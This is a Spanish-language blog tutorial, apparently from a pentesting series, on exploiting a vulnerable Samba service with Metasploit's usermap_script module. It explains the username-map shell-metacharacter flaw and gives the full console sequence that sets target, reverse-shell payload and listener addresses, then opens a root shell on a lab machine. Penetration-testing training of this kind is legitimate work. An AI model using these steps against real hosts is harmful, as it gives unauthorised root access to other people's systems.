Inicio > Hacking, MetaSploit > Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte V

Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte V

CONCEPTOS BASICOS DE PENETRACION BAJO PLATAFORMA GNU/LINUX(VULNERABLE) USANDO METASPLOIT FRAMEWORK – PARTE V
Atacando un servicio Samba Vulnerable

Encontrando Vulnerabilidades sobre el servicio NetBios Samba (puerto 139 y 445)

Se trata de un servicio que tiene múltiples vulnerabilidades bajo sistemas Windows y que frecuentemente es el punto de acceso de un pentester, en el caso de GNU/Linux ocurre lo mismo, también es posible explotar vulnerabilidades existentes en el servicio de Samba, especialmente cuando no se encuentra correctamente parcheado.

Para demostrar como encontrar y explotar vulnerabilidades existentes en el servicio Samba utilizando metasploit framework se siguen los siguientes pasos:

  1. Buscar por patrones de auxiliaries y exploits relacionados con este servicio.
msf auxiliary(telnet_login) > search samba
[*] Searching loaded modules for pattern ‘samba’…Auxiliary=========

Name Disclosure Date Rank Description

—- ————— —- ———–

admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal

dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow

dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow

Exploits

========

Name Disclosure Date Rank Description

—- ————— —- ———–

freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)

linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)

linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow

linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)

multi/samba/nttrans 2003-04-07 average Samba 2.2.2 – 2.2.6 nttrans Buffer Overflow

multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution

osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)

solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow

solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)

unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution

windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow

windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow

  1. Después de listar los exploits disponibles se ha procedido a probar los mas prometedores, los mejores resultados se encuentran en el exploit usermap_script con el que se ha conseguido comprometer el servicio, este exploit esta relacionado con la vulnerabilidad de ejecución remota de código existente en las versiones 3.0.20 y 3.0.25 de Samba, consiste en la creación de un mapa de usuarios que es empleado por el mecanismo de autenticación antes de ser llevado a cabo, lo que le permite a un atacante remoto hacer un “bypass” del proceso de autorización propiamente dicho, esta vulnerabilidad solamente es reproducible cuando se especifica explicitamente la opción de configuración “username map script” de esta forma un atacante puede especificar un nombre de usuario con meta caracteres de shell que pueden invocar a /bin/sh. Se trata de un defecto en la validación del usuario ingresado para ejecutar el proceso de autenticación, no obstante, el proceso de autenticación propiamente dicho no es sobrepasado, de hecho se generan trazas de la conexión
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):Name Current Setting Required Description

—- ————— ——– ———–

RHOST 192.168.1.34 yes The target address

RPORT 445 yes The target port

Exploit target:

Id Name

— —-

0 Automatic

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse

PAYLOAD => cmd/unix/reverse

msf exploit(usermap_script) > set LHOST 192.168.1.33

LHOST => 192.168.1.33

msf exploit(usermap_script) > exploit

[*] Started reverse double handler

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo rm6wOwiDrg4PM9Ug;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: “rm6wOwiDrg4PM9Ug\r\n”

[*] Matching…

[*] A is input…

[*] Command shell session 4 opened (192.168.1.33:4444 -> 192.168.1.34:53107) at Wed May 18 00:40:18 +0200 2011

uname -r

2.6.24-16-server

whoami

root

Como nota final, este exploit funciona de la misma forma tanto si se indica el puerto 445 o el 139.

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: